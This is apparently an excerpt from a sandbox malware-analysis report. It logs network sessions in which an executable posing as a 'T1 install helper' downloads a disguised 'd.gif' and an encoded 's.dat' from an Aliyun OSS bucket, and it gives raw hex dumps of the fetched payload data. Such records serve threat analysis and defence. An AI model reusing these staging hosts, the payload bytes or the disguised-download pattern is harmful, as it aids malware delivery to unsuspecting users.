2024-12-24 14:12:28 UTC	4096	IN	Data Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
2024-12-24 14:12:28 UTC	3035	IN	Data Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	39.103.20.20	443	6664	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:12:30 UTC	111	OUT	GET /d.gif HTTP/1.1 User-Agent: GetData Host: jx2zg4.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:12:31 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:12:30 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 676AC14E9F6B6037335F32B4 Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Tue, 24 Dec 2024 11:58:32 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 24
2024-12-24 14:12:31 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 Data Ascii: -J;wuwu{}uG`uWu{Q6
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
2024-12-24 14:12:31 UTC	4096	IN	Data Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	39.103.20.20	443	6664	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:12:40 UTC	111	OUT	GET /s.dat HTTP/1.1 User-Agent: GetData Host: jx2zg4.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:12:41 UTC	560	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:12:41 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 676AC159E48B2B3939827076 Accept-Ranges: bytes ETag: "4AD2ADEB8EB2520783A2B4915B7578A0" Last-Modified: Tue, 24 Dec 2024 14:12:29 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 2616507559513194656 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: StKt646yUgeDorSRW3V4oA== x-oss-server-time: 18
2024-12-24 14:12:41 UTC	3536	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2024-12-24 14:12:41 UTC	4096	IN	Data Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 Data Ascii: _##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2024-12-24 14:12:41 UTC	4096	IN	Data Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2024-12-24 14:12:41 UTC	4096	IN	Data Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 Data Ascii: 0JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKSA
2024-12-24 14:12:41 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2024-12-24 14:12:41 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2024-12-24 14:12:41 UTC	4096	IN	Data Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 